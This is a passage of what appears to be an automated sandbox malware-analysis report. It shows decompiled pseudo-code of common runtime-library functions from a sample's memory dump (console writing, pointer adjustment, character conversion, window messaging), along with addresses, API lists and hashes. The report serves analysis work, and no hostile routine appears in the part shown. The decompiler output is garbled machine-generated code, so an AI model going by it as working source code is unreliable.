				signed int _t285;
				signed char* _t286;
				struct _OVERLAPPED* _t289;
				void* _t292;
				signed int _t293;
				signed int _t295;
				struct _OVERLAPPED* _t296;
				signed char* _t298;
				intOrPtr* _t299;
				void* _t300;
				signed int _t301;
				long _t302;
				signed int _t304;
				signed int _t305;
				void* _t306;
				void* _t307;
				void* _t308;

				_push(0xffffffff);
				_push(0x40d469);
				_push( *[fs:0x0]);
				_t307 = _t306 - 0x74;
				_t174 =  *0x415010; // 0xb51c3102
				_t175 = _t174 ^ _t305;
				_v20 = _t175;
				_push(_t175);
				 *[fs:0x0] =  &_v16;
				_t177 = _a8;
				_t298 = _a12;
				_t261 = _a20;
				_t265 = (_t177 & 0x0000003f) * 0x38;
				_t285 = _t177 >> 6;
				_v100 = _t298;
				_v64 = _t261;
				_v72 = _t285;
				_v84 = _t265;
				_v104 =  *((intOrPtr*)(_t265 +  *((intOrPtr*)(0x4160f8 + _t285 * 4)) + 0x18));
				_v88 = _a16 + _t298;
				_t183 = GetConsoleOutputCP();
				_t309 =  *((char*)(_t261 + 0x14));
				_v112 = _t183;
				if( *((char*)(_t261 + 0x14)) == 0) {
					E00405940(_t261, _t285, _t309);
				}
				_t299 = _a4;
				_t266 =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0xc)) + 8));
				asm("stosd");
				_v116 = _t266;
				asm("stosd");
				asm("stosd");
				_t186 = _v100;
				_t286 = _t186;
				_v48 = _t286;
				if(_t186 < _v88) {
					_t293 = _v84;
					_t263 = 0;
					_v76 = 0;
					while(1) {
						_v49 =  *_t286;
						_t190 = _v72;
						_v68 = _t263;
						_v56 = 1;
						if(_t266 != 0xfde9) {
							goto L22;
						}
						_t274 = _t263;
						_t228 =  *(0x4160f8 + _t190 * 4) + 0x2e + _t293;
						_v76 = _t228;
						while( *_t228 != 0) {
							_t274 =  &(_t274->Internal);
							_t228 = _t228 + 1;
							if(_t274 < 5) {
								continue;
							}
							break;
						}
						_t295 = _v88 - _t286;
						_v56 = _t274;
						if(_t274 <= 0) {
							_t276 =  *((char*)(( *_t286 & 0x000000ff) + 0x415778)) + 1;
							_v80 = _t276;
							__eflags = _t276 - _t295;
							if(_t276 > _t295) {
								__eflags = _t295;
								if(_t295 <= 0) {
									goto L44;
								} else {
									_t301 = _v84;
									do {
										 *((char*)( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t301 + _t263 + 0x2e)) =  *((intOrPtr*)(_t263 + _t286));
										_t263 =  &(_t263->Internal);
										__eflags = _t263 - _t295;
									} while (_t263 < _t295);
									goto L43;
								}
								L52:
							} else {
								_v132 = _t263;
								__eflags = _t276 - 4;
								_v128 = _t263;
								_v60 = _t286;
								_v56 = (_t276 == 4) + 1;
								_t237 = E0040AD3D( &_v132,  &_v68,  &_v60, (_t276 == 4) + 1,  &_v132, _v64);
								_t308 = _t307 + 0x14;
								__eflags = _t237 - 0xffffffff;
								if(_t237 != 0xffffffff) {
									_t293 = _v84;
									goto L21;
								}
							}
						} else {
							_t243 =  *((char*)(( *_v76 & 0x000000ff) + 0x415778)) + 1;
							_v60 = _t243;
							_t244 = _t243 - _t274;
							_v80 = _t244;
							if(_t244 > _t295) {
								__eflags = _t295;
								if(_t295 > 0) {
									_t245 = _v48;
									_t302 = _v56;
									do {
										_t281 =  *((intOrPtr*)(_t263 + _t245));
										_t286 =  *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _v84 + _t263;
										_t263 =  &(_t263->Internal);
										_t286[_t302 + 0x2e] = _t281;
										__eflags = _t263 - _t295;
									} while (_t263 < _t295);
									L43:
									_t299 = _a4;
								}
								L44:
								 *(_t299 + 4) =  &(( *(_t299 + 4))[_t295]);
							} else {
								_t296 = _t263;
								_t264 = _v76;
								do {
									 *((char*)(_t305 + _t296 - 0x18)) =  *_t264;
									_t296 =  &(_t296->Internal);
									_t264 = _t264 + 1;
								} while (_t296 < _t274);
								_t303 = _v80;
								_t263 = 0;
								if(_v80 > 0) {
									E00403120( &_v28 + _t274, _t286, _t303);
									_t274 = _v56;
									_t307 = _t307 + 0xc;
								}
								_t293 = _v84;
								_t289 = _t263;
								_t304 = _v72;
								do {
									 *( *((intOrPtr*)(0x4160f8 + _t304 * 4)) + _t293 + _t289 + 0x2e) = _t263;
									_t289 =  &(_t289->Internal);
								} while (_t289 < _t274);
								_t299 = _a4;
								_v108 =  &_v28;
								_v124 = _t263;
								_v120 = _t263;
								_v56 = (_v60 == 4) + 1;
								_t255 = E0040AD3D( &_v124,  &_v68,  &_v108, (_v60 == 4) + 1,  &_v124, _v64);
								_t308 = _t307 + 0x14;
								if(_t255 != 0xffffffff) {
									L21:
									_t197 =  &(_v48[_v80]) - 1;
									L31:
									_v48 = _t197 + 1;
									_t201 = E00407464(_v112, _t263,  &_v68, _v56,  &_v44, 5, _t263, _t263);
									_t307 = _t308 + 0x20;
									_v60 = _t201;
									if(_t201 != 0) {
										if(WriteFile(_v104,  &_v44, _t201,  &_v96, _t263) == 0) {
											L50:
											 *_t299 = GetLastError();
										} else {
											_t286 = _v48;
											_t207 =  *((intOrPtr*)(_t299 + 8)) - _v100 + _t286;
											_v76 = _t207;
											 *(_t299 + 4) = _t207;
											if(_v96 >= _v60) {
												if(_v49 != 0xa) {
													L38:
													if(_t286 < _v88) {
														_t266 = _v116;
														continue;
													}
												} else {
													_t209 = 0xd;
													_v92 = _t209;
													if(WriteFile(_v104,  &_v92, 1,  &_v96, _t263) == 0) {
														goto L50;
													} else {
														if(_v96 >= 1) {
															 *((intOrPtr*)(_t299 + 8)) =  *((intOrPtr*)(_t299 + 8)) + 1;
															 *(_t299 + 4) =  &(( *(_t299 + 4))[1]);
															_t286 = _v48;
															_v76 =  *(_t299 + 4);
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L22:
						_t271 =  *(0x4160f8 + _t190 * 4);
						_v80 = _t271;
						_t191 =  *((intOrPtr*)(_t271 + _t293 + 0x2d));
						__eflags = _t191 & 0x00000004;
						if((_t191 & 0x00000004) == 0) {
							_t271 =  *_t286 & 0x000000ff;
							_t194 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
							__eflags =  *((intOrPtr*)(_t194 + _t271 * 2)) - _t263;
							if( *((intOrPtr*)(_t194 + _t271 * 2)) >= _t263) {
								_push(_v64);
								_push(1);
								_push(_t286);
								goto L29;
							} else {
								_t214 =  &(_t286[1]);
								_v60 = _t214;
								__eflags = _t214 - _v88;
								if(_t214 >= _v88) {
									 *((char*)(_v80 + _t293 + 0x2e)) =  *_t286;
									 *( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t293 + 0x2d) =  *( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t293 + 0x2d) | 0x00000004;
									 *(_t299 + 4) =  &(_v76[1]);
								} else {
									_t221 = E0040942F(_t271, _t286,  &_v68, _t286, 2, _v64);
									_t308 = _t307 + 0x10;
									__eflags = _t221 - 0xffffffff;
									if(_t221 != 0xffffffff) {
										_t197 = _v60;
										goto L31;
									}
								}
							}
						} else {
							_push(_v64);
							_v36 =  *(_t271 + _t293 + 0x2e) & 0x000000fb;
							_t224 =  *_t286;
							_v35 = _t224;
							 *((char*)(_t271 + _t293 + 0x2d)) = _t224;
							_push(2);
							_push( &_v36);
							L29:
							_push( &_v68);
							_t196 = E0040942F(_t271, _t286);
							_t308 = _t307 + 0x10;
							__eflags = _t196 - 0xffffffff;
							if(_t196 != 0xffffffff) {
								_t197 = _v48;
								goto L31;
							}
						}
						goto L51;
					}
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t292);
				_pop(_t300);
				_pop(_t262);
				__eflags = _v20 ^ _t305;
				return E004018D4(_t299, _t262, _v20 ^ _t305, _t286, _t292, _t300);
				goto L52;
			}



















































































                    0x00409f92
                    0x00409f94
                    0x00409f9f
                    0x00409fa0
                    0x00409fa3
                    0x00409fa8
                    0x00409faa
                    0x00409fb0
                    0x00409fb4
                    0x00409fba
                    0x00409fbf
                    0x00409fc5
                    0x00409fc8
                    0x00409fcb
                    0x00409fce
                    0x00409fd1
                    0x00409fd4
                    0x00409fde
                    0x00409fe5
                    0x00409fed
                    0x00409ff0
                    0x00409ff6
                    0x00409ffa
                    0x00409ffd
                    0x0040a001
                    0x0040a001
                    0x0040a009
                    0x0040a00e
                    0x0040a013
                    0x0040a014
                    0x0040a017
                    0x0040a018
                    0x0040a019
                    0x0040a01c
                    0x0040a01e
                    0x0040a024
                    0x0040a02a
                    0x0040a02d
                    0x0040a02f
                    0x0040a032
                    0x0040a034
                    0x0040a037
                    0x0040a03a
                    0x0040a03d
                    0x0040a04a
                    0x00000000
                    0x00000000
                    0x0040a057
                    0x0040a05c
                    0x0040a05e
                    0x0040a061
                    0x0040a066
                    0x0040a067
                    0x0040a06b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040a06b
                    0x0040a070
                    0x0040a072
                    0x0040a077
                    0x0040a12b
                    0x0040a12c
                    0x0040a12f
                    0x0040a131
                    0x0040a2e9
                    0x0040a2eb
                    0x00000000
                    0x0040a2ed
                    0x0040a2ed
                    0x0040a2f0
                    0x0040a2ff
                    0x0040a303
                    0x0040a304
                    0x0040a304
                    0x00000000
                    0x0040a308
                    0x00000000
                    0x0040a137
                    0x0040a13c
                    0x0040a13f
                    0x0040a142
                    0x0040a148
                    0x0040a151
                    0x0040a15c
                    0x0040a161
                    0x0040a164
                    0x0040a167
                    0x0040a16d
                    0x00000000
                    0x0040a16d
                    0x0040a167
                    0x0040a07d
                    0x0040a08a
                    0x0040a08b
                    0x0040a08e
                    0x0040a090
                    0x0040a095
                    0x0040a2bc
                    0x0040a2be
                    0x0040a2c0
                    0x0040a2c3
                    0x0040a2c6
                    0x0040a2d3
                    0x0040a2d6
                    0x0040a2d8
                    0x0040a2d9
                    0x0040a2dd
                    0x0040a2dd
                    0x0040a2e1
                    0x0040a2e1
                    0x0040a2e1
                    0x0040a2e4
                    0x0040a2e4
                    0x0040a09b
                    0x0040a09b
                    0x0040a09d
                    0x0040a0a0
                    0x0040a0a2
                    0x0040a0a6
                    0x0040a0a7
                    0x0040a0a8
                    0x0040a0ac
                    0x0040a0af
                    0x0040a0b3
                    0x0040a0bd
                    0x0040a0c2
                    0x0040a0c5
                    0x0040a0c5
                    0x0040a0c8
                    0x0040a0cb
                    0x0040a0cd
                    0x0040a0d0
                    0x0040a0d9
                    0x0040a0dd
                    0x0040a0de
                    0x0040a0e5
                    0x0040a0eb
                    0x0040a0f3
                    0x0040a0fe
                    0x0040a103
                    0x0040a10e
                    0x0040a113
                    0x0040a119
                    0x0040a170
                    0x0040a176
                    0x0040a20b
                    0x0040a210
                    0x0040a222
                    0x0040a227
                    0x0040a22a
                    0x0040a22f
                    0x0040a24a
                    0x0040a32b
                    0x0040a331
                    0x0040a250
                    0x0040a256
                    0x0040a259
                    0x0040a25b
                    0x0040a25e
                    0x0040a267
                    0x0040a271
                    0x0040a2af
                    0x0040a2b2
                    0x0040a2b4
                    0x00000000
                    0x0040a2b4
                    0x0040a273
                    0x0040a275
                    0x0040a277
                    0x0040a290
                    0x00000000
                    0x0040a296
                    0x0040a29a
                    0x0040a2a0
                    0x0040a2a3
                    0x0040a2a9
                    0x0040a2ac
                    0x00000000
                    0x0040a2ac
                    0x0040a29a
                    0x0040a290
                    0x0040a271
                    0x0040a267
                    0x0040a24a
                    0x0040a22f
                    0x0040a119
                    0x0040a095
                    0x00000000
                    0x0040a17c
                    0x0040a17c
                    0x0040a183
                    0x0040a186
                    0x0040a18a
                    0x0040a18d
                    0x0040a1b0
                    0x0040a1b6
                    0x0040a1b8
                    0x0040a1bc
                    0x0040a1ed
                    0x0040a1f0
                    0x0040a1f2
                    0x00000000
                    0x0040a1be
                    0x0040a1be
                    0x0040a1c1
                    0x0040a1c4
                    0x0040a1c7
                    0x0040a30f
                    0x0040a31d
                    0x0040a326
                    0x0040a1cd
                    0x0040a1d7
                    0x0040a1dc
                    0x0040a1df
                    0x0040a1e2
                    0x0040a1e8
                    0x00000000
                    0x0040a1e8
                    0x0040a1e2
                    0x0040a1c7
                    0x0040a18f
                    0x0040a196
                    0x0040a199
                    0x0040a19c
                    0x0040a19e
                    0x0040a1a1
                    0x0040a1a8
                    0x0040a1aa
                    0x0040a1f3
                    0x0040a1f6
                    0x0040a1f7
                    0x0040a1fc
                    0x0040a1ff
                    0x0040a202
                    0x0040a208
                    0x00000000
                    0x0040a208
                    0x0040a202
                    0x00000000
                    0x0040a18d
                    0x0040a032
                    0x0040a333
                    0x0040a338
                    0x0040a340
                    0x0040a341
                    0x0040a342
                    0x0040a346
                    0x0040a34e
                    0x00000000

                    APIs
                    • GetConsoleOutputCP.KERNEL32(B51C3102,00000000,00000000,00000008), ref: 00409FF0
                      • Part of subcall function 00407464: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00409C6B,?,00000000,-00000008), ref: 004074C5
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040A242
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040A288
                    • GetLastError.KERNEL32 ref: 0040A32B
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                    • String ID:
                    • API String ID: 2112829910-0
                    • Opcode ID: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                    • Instruction ID: 286eb15663e9a8c4fe1ad12a89817a662dc5e0061b0541279607a600132331f4
                    • Opcode Fuzzy Hash: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                    • Instruction Fuzzy Hash: 47D18BB5D042589FCB14CFA8C8809EDBBB4FF08304F14817AE866FB391D634A956CB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403694 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 66%
                    			E00403694(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x413518);
				E00401EE0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00403120(_t107, E00402768(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00403120(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x415c6c; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x40e160();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E0040579A(_t75, _t84, _t97, _t107);
									asm("int3");
									_push(8);
									_push(0x413538);
									E00401EE0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00403694(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00404404(_t103, _t108[0x18], E00402768( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00404414(_t103, _t108[0x18], E00402768( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00402768();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                    0x00403694
                    0x00403696
                    0x0040369b
                    0x004036a0
                    0x004036a2
                    0x004036a5
                    0x004036aa
                    0x004037ba
                    0x004037ba
                    0x004037ba
                    0x00000000
                    0x004036b9
                    0x004036b9
                    0x004036be
                    0x004036c8
                    0x004036ca
                    0x004036cf
                    0x004036d4
                    0x004036d4
                    0x004036d6
                    0x004036d9
                    0x004036de
                    0x00403700
                    0x00403700
                    0x00403703
                    0x00403706
                    0x00403724
                    0x00403727
                    0x00403766
                    0x00403769
                    0x0040376c
                    0x00403791
                    0x00403793
                    0x00000000
                    0x00403795
                    0x00403795
                    0x00403797
                    0x00000000
                    0x00403799
                    0x00403799
                    0x0040379e
                    0x004037a2
                    0x004037a2
                    0x004037a3
                    0x00000000
                    0x004037a3
                    0x00403797
                    0x0040376e
                    0x0040376e
                    0x00403770
                    0x00000000
                    0x00403772
                    0x00403772
                    0x00403774
                    0x00000000
                    0x00403776
                    0x00403787
                    0x00000000
                    0x0040378c
                    0x00403774
                    0x00403770
                    0x00403729
                    0x00403729
                    0x0040372d
                    0x00000000
                    0x00403733
                    0x00403733
                    0x00403735
                    0x00000000
                    0x0040373b
                    0x00403742
                    0x0040374a
                    0x0040374e
                    0x00403750
                    0x00403753
                    0x00403758
                    0x00403759
                    0x00000000
                    0x00403759
                    0x00403753
                    0x00000000
                    0x0040374e
                    0x00403735
                    0x0040372d
                    0x00403708
                    0x00403708
                    0x00000000
                    0x00403708
                    0x004036e5
                    0x004036e5
                    0x004036ea
                    0x004036ef
                    0x00000000
                    0x004036f1
                    0x004036f3
                    0x004036fc
                    0x0040370b
                    0x0040370d
                    0x004037cc
                    0x004037cc
                    0x004037d1
                    0x004037d2
                    0x004037d4
                    0x004037d9
                    0x004037de
                    0x004037e1
                    0x004037e4
                    0x004037e7
                    0x004037f0
                    0x004037f0
                    0x004037e9
                    0x004037e9
                    0x004037e9
                    0x004037f3
                    0x004037f7
                    0x004037fa
                    0x004037fb
                    0x004037fc
                    0x004037fd
                    0x00403800
                    0x00403809
                    0x00403809
                    0x0040380c
                    0x00403842
                    0x0040380e
                    0x0040380e
                    0x0040380e
                    0x00403811
                    0x00403828
                    0x00403828
                    0x00403811
                    0x00403847
                    0x00403851
                    0x0040385d
                    0x0040371b
                    0x0040371b
                    0x00403720
                    0x00403721
                    0x0040375b
                    0x00403762
                    0x004037a6
                    0x004037a6
                    0x004037ad
                    0x004037bc
                    0x004037bf
                    0x004037cb
                    0x004037cb
                    0x0040370d
                    0x004036ef
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004036be

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                    • Instruction ID: c36bffaf7fe8f9e15fcbe67479aef6d6b820bcd02780ea586b95a92c856a1c7e
                    • Opcode Fuzzy Hash: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                    • Instruction Fuzzy Hash: E45103F6600202AFDB299F21C840B6A7BA9EF40B06F14813FE805672D1D739EE41C798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 002892BB Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E002892BB(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E002841F6( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E002893EB( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00283CF8(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                    0x002892c5
                    0x002892cc
                    0x002892e3
                    0x00000000
                    0x002892d3
                    0x002892d5
                    0x002892ef
                    0x002892f4
                    0x002892f7
                    0x002892fa
                    0x00289322
                    0x00289329
                    0x0028932b
                    0x002893ac
                    0x002893c7
                    0x002893c9
                    0x00289309
                    0x00289309
                    0x0028930c
                    0x0028930e
                    0x00289311
                    0x00289311
                    0x00289311
                    0x00289311
                    0x00000000
                    0x00289317
                    0x0028938b
                    0x0028938b
                    0x00289390
                    0x00289396
                    0x00289399
                    0x0028939b
                    0x0028939e
                    0x0028939e
                    0x0028939e
                    0x0028939e
                    0x00000000
                    0x002893a2
                    0x0028932d
                    0x00289330
                    0x00289336
                    0x00289339
                    0x00289360
                    0x00289363
                    0x00289369
                    0x00000000
                    0x00000000
                    0x0028936b
                    0x0028936e
                    0x00000000
                    0x00000000
                    0x00289370
                    0x00289370
                    0x00289376
                    0x00289379
                    0x002892e8
                    0x002892e8
                    0x00289382
                    0x00000000
                    0x00289382
                    0x0028933b
                    0x0028933e
                    0x00000000
                    0x00000000
                    0x00289342
                    0x00289353
                    0x00289359
                    0x0028935b
                    0x0028935e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0028935e
                    0x002892fc
                    0x002892ff
                    0x00289301
                    0x00289306
                    0x00289306
                    0x00000000
                    0x002892d7
                    0x002892d7
                    0x002892dc
                    0x002892e0
                    0x002892e0
                    0x00000000
                    0x002892dc
                    0x002892d5

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002892EF
                    • __isleadbyte_l.LIBCMT ref: 00289322
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00282E0D,?,00000000,00000000,?,?,?,?,00282E0D,00000000,?), ref: 00289353
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00282E0D,00000001,00000000,00000000,?,?,?,?,00282E0D,00000000,?), ref: 002893C1
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: e92abb991ef77fd61edb1738c920f96238c612f6d8e32b31cf1c8921328d1ad9
                    • Instruction ID: 6c49353cee6375a8602430ad49f29ad01738cb9e001f183b89820eef730d803d
                    • Opcode Fuzzy Hash: e92abb991ef77fd61edb1738c920f96238c612f6d8e32b31cf1c8921328d1ad9
                    • Instruction Fuzzy Hash: 3931E235A2224AFFCB10EF64C8859BE3BB8BF01311F1885A9E4659B1D6D330CDA0DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281090 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E00281090() {
				void* _v8;
				void* _v12;
				void* _v524;
				int _t10;
				long _t13;
				long _t17;
				int _t28;
				int _t29;

				SendMessageW( *0x2970ec, 0xb0,  &_v12,  &_v8);
				_t10 = _v12;
				_t28 = _v8;
				if(_t10 != _t28) {
					if(_t10 <  *0x298270) {
						_t28 = _t10;
					}
				} else {
					 *0x298270 = _t10;
				}
				_t29 = SendMessageW( *0x2970ec, 0xc9, _t28, 0);
				_t13 = SendMessageW( *0x2970ec, 0xbb, _t29, 0);
				if( *0x298274 != _t29 ||  *0x298278 != _t28) {
					_push(_t28 - _t13 + 1);
					_t5 = _t29 + 1; // 0x1
					E00281000( &_v524, 0x231,  *0x2970fc, _t5);
					_t17 = SendMessageW( *0x2970f4, 0x29, 0,  &_v524);
					 *0x298274 = _t29;
					 *0x298278 = _t28;
					return _t17;
				} else {
					return _t13;
				}
			}











                    0x002810b6
                    0x002810b8
                    0x002810bb
                    0x002810c0
                    0x002810cf
                    0x002810d1
                    0x002810d1
                    0x002810c2
                    0x002810c2
                    0x002810c2
                    0x002810eb
                    0x002810f4
                    0x002810fc
                    0x00281111
                    0x00281112
                    0x00281123
                    0x0028113d
                    0x0028113f
                    0x00281145
                    0x00000000
                    0x00281151
                    0x00281151
                    0x00281151

                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002810B6
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002810E1
